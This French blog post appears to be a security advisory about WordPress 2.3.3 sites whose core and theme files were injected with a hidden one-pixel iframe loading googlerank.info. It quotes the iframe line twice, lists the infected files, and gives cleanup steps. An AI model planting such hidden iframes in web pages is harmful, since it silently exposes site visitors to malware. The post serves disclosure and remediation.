Faille découverte sur Wordpress 2.3.3

Bienvenue sur le Journal du Blog, vous pouvez vous abonner au flux RSS. Merci pour votre visite!

Verne de Creative Breafing vient de découvrir la première faille sur la dernière version de Wordpress (2.3.3)

It came to my attention in the last few days that a handful of people had been experiencing some errors when viewing this site. Many visitors had the site return a 404 Page Not Found error page, while others had their browser crash completely. One individual even reported that their anti-virus software had thrown a red flag while visiting this site. My first instinct was that one of the site’s plugins were causing the errors, but upon further investigation, I have found what I believe to be the catalyst: googlerank.info.

Il nous explique que beaucoup de ses utilisateurs rencontraient des problèmes d’erreurs 404 ou de détections de virus lorsqu’ils consultaient son blog. Le problème viendrait selon lui de googlerank.info

Plus précisement cette ligne de code :

<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>

Voici la liste des fichiers concernés par le problème :

• /wp-admin/admin-footer.php
• /wp-admin/upload.php
• /wp-content/themes/yourtheme/footer.php
• /wp-includes/js/tinymce/blank.htm
• /wp-includes/js/tinymce/license.htm
• /wp-includes/js/tinymce/plugins/paste/blank.htm
• /wp-includes/js/tinymce/plugins/paste/pastetext.htm
• /wp-includes/js/tinymce/plugins/paste/pasteworld.htm
• /wp-includes/js/tinymce/themes/advanced/about.htm
• /wp-includes/js/tinymce/themes/advanced/anchor.htm
• /wp-includes/js/tinymce/themes/advanced/charmap.htm
• /wp-includes/js/tinymce/themes/advanced/color_picker.htm
• /wp-includes/js/tinymce/themes/advanced/image.htm
• /wp-includes/js/tinymce/themes/advanced/link.htm
• /wp-includes/js/tinymce/themes/advanced/source_editor.htm

Une solution (temporaire) :

1. Re-uploadez votre ficiher footer.php file dans le dossier de votre thème. Assurez vous d’avoir supprimer la ligne cité ci dessus au préalable
2. Si vous utilisez l’editeur de thème via l’admin Wordpress, éditez le ficiher footer.php (pied de page). Cherchez la ligne de code suivante puis supprimez là :<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
3. Téléchargez la dernière version de Wordpress ici
4. Copiez les dossier /wp-admin/ et /wp-includes/ sur votre serveur en écrasant les fichiers antérieur, cela remettra en place votre version de Wordpress.

La sortie de la version 2.5 de wordpress va t’elle faire son apparation plus tôt que prévu ?

Crédit photo/montage  : Business Garden